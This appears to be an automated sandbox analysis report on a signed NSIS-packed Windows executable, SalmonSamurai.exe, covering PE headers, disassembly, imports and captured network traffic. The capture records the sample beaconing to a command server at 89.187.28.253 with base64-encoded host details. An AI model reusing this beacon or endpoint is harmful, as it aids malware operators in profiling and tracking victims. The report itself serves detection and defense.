                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Entrypoint:0x403665
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e

                                                                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                                                                              Signature Valid:true
                                                                                                                                                                                                                                              Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                              Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                              Error Number:0
                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                              • 14/12/2024 08:21:02 06/12/2025 09:00:54
                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                              • CN=ELEFAR LLC, O=ELEFAR LLC, STREET="ul Polyany, 5A / korpus 1 pomeshch 7n", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1217700082577, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                              Thumbprint MD5:3339AD8CCE8923C682D0E416361BF47B
                                                                                                                                                                                                                                              Thumbprint SHA-1:901F3FE4E599CD155132CE2B6BF3C5F6D1E0387C
                                                                                                                                                                                                                                              Thumbprint SHA-256:043C75759AB9230C929F661168CA533CC92EDF88D480EAFF3DCEB04C6BFC6AC4
                                                                                                                                                                                                                                              Serial:301385AA36FAE635E74BB88E

                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              sub esp, 000003F8h
                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                              mov dword ptr [esp+20h], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+18h], 0040A230h
                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                              call dword ptr [004080A0h]
                                                                                                                                                                                                                                              mov esi, dword ptr [004080A4h]
                                                                                                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                                                                              call esi
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              jne 00007F7F9D30086Ah
                                                                                                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                              mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              call esi
                                                                                                                                                                                                                                              mov ax, word ptr [esp+48h]
                                                                                                                                                                                                                                              mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                                                                              sub ax, 00000053h
                                                                                                                                                                                                                                              add ecx, FFFFFFD0h
                                                                                                                                                                                                                                              neg ax
                                                                                                                                                                                                                                              sbb eax, eax
                                                                                                                                                                                                                                              mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                                                                              not eax
                                                                                                                                                                                                                                              and eax, ecx
                                                                                                                                                                                                                                              mov word ptr [esp+00000148h], ax
                                                                                                                                                                                                                                              cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                                                                                              jnc 00007F7F9D300838h
                                                                                                                                                                                                                                              and word ptr [esp+42h], 0000h
                                                                                                                                                                                                                                              mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                                                              movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                                                                                              mov dword ptr [00429B18h], eax
                                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                                              mov ah, byte ptr [esp+38h]
                                                                                                                                                                                                                                              movzx eax, ax
                                                                                                                                                                                                                                              or eax, ecx
                                                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                                                              mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                                                                                              movzx ecx, cx
                                                                                                                                                                                                                                              shl eax, 10h
                                                                                                                                                                                                                                              or eax, ecx
                                                                                                                                                                                                                                              movzx ecx, byte ptr [esp+0000004Eh]

                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000xbff0.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x4695db80x2368
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x10000x66d70x68004e97e586f167bf2d2eddcdba22e25c0eFalse0.6615835336538461data6.441769857560007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .data0xa0000x1fb780x600e411b225ac3cd03a5dad8143ae82958dFalse0.5091145833333334data4.122928093833695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .ndata0x2a0000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .rsrc0x460000xbff00xc000951d482944a10118ca7b1c23ecd70b02False0.7726847330729166data6.87682750773503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_ICON0x462b00x8f8dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9947209447876133
                                                                                                                                                                                                                                              RT_ICON0x4f2400xea8dataEnglishUnited States0.007196162046908316
                                                                                                                                                                                                                                              RT_ICON0x500e80x8a8dataEnglishUnited States0.01128158844765343
                                                                                                                                                                                                                                              RT_ICON0x509900x568dataEnglishUnited States0.014450867052023121
                                                                                                                                                                                                                                              RT_ICON0x50ef80x468dataEnglishUnited States0.015957446808510637
                                                                                                                                                                                                                                              RT_ICON0x513600x2e8dataEnglishUnited States0.020161290322580645
                                                                                                                                                                                                                                              RT_ICON0x516480x128dataEnglishUnited States0.04391891891891892
                                                                                                                                                                                                                                              RT_DIALOG0x517700x202dataEnglishUnited States0.4085603112840467
                                                                                                                                                                                                                                              RT_DIALOG0x519780xf8dataEnglishUnited States0.6290322580645161
                                                                                                                                                                                                                                              RT_DIALOG0x51a700xeedataEnglishUnited States0.6302521008403361
                                                                                                                                                                                                                                              RT_GROUP_ICON0x51b600x68dataEnglishUnited States0.23076923076923078
                                                                                                                                                                                                                                              RT_MANIFEST0x51bc80x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                                                                                                                              SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                                                                                                                              ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                                                                                                                              COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                                                                                                                              USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                                                                                                                              GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                                                                                                                              KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.377296925 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.377347946 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.377412081 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.377861023 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.377876043 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.066263914 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.066338062 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.066407919 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.066687107 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.066700935 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.597376108 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.597805023 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.597834110 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.598731041 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.598794937 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.600832939 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.600898027 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.601042986 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.601053953 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:02.643623114 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.027549982 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.027754068 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.027823925 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.028306961 CET49782443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.028330088 CET44349782172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.279675007 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.280014992 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.280052900 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.280950069 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.281017065 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.281409979 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.281466961 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.281582117 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.281589985 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.331139088 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.440798044 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.440893888 CET44349783172.64.41.3192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:03.440944910 CET49783443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:31.823443890 CET4985380192.168.2.789.187.28.253
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:31.943074942 CET804985389.187.28.253192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:31.943181992 CET4985380192.168.2.789.187.28.253
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:31.943883896 CET4985380192.168.2.789.187.28.253
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:32.063473940 CET804985389.187.28.253192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:33.343441963 CET804985389.187.28.253192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:33.343724966 CET804985389.187.28.253192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:33.343785048 CET4985380192.168.2.789.187.28.253
                                                                                                                                                                                                                                              Dec 23, 2024 16:53:33.440970898 CET4985380192.168.2.789.187.28.253
                                                                                                                                                                                                                                              Dec 23, 2024 16:53:33.560668945 CET804985389.187.28.253192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:54:33.566165924 CET4985380192.168.2.789.187.28.253
                                                                                                                                                                                                                                              Dec 23, 2024 16:54:33.685856104 CET804985389.187.28.253192.168.2.7

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.238966942 CET6137853192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.239322901 CET5509653192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.375930071 CET53613781.1.1.1192.168.2.7
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.376296043 CET53550961.1.1.1192.168.2.7

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.238966942 CET192.168.2.71.1.1.10xd9d4Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.239322901 CET192.168.2.71.1.1.10xe760Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.375930071 CET1.1.1.1192.168.2.70xd9d4No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.375930071 CET1.1.1.1192.168.2.70xd9d4No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:01.376296043 CET1.1.1.1192.168.2.70xe760No error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                              • 89.187.28.253

                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.74985389.187.28.253803964C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:31.943883896 CET636OUTGET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV8zV1JTTF90cnVlX0RQU19YSV9XaW5kb3dzIDEwIFByb185NiBtaW51dGVzICgwLjYwIGhvdXJzKV9DOlxVc2Vyc1xmcm9udGRlc2tfNTcxMzQ1X2Zyb250ZGVza19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGZyb250ZGVza1xBcHBEYXRhXFJvYW1pbmdfQzpcVXNlcnNcRlJPTlREfjFcQXBwRGF0YVxMb2NhbFxUZW1wX0ZST05UREVTSy1QQ19fSW50ZWw2NCBGYW1pbHkgNiBNb2RlbCAxNDMgU3RlcHBpbmcgOCwgR2VudWluZUludGVsX0FNRDY0X0M6XzJfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1
                                                                                                                                                                                                                                              Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                              User-Agent: axios/0.27.2
                                                                                                                                                                                                                                              Host: 89.187.28.253
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:33.343441963 CET321INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 15:52:33 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                              Dec 23, 2024 16:53:33.440970898 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Dec 23, 2024 16:54:33.566165924 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.749782172.64.41.34432520C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 15:52:02 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                              2024-12-23 15:52:02 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                              2024-12-23 15:52:03 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 15:52:02 GMT
                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                              CF-RAY: 8f698439fb594273-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              2024-12-23 15:52:03 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ff 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.749783172.64.41.34432520C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 15:52:03 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                              2024-12-23 15:52:03 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:10:51:17
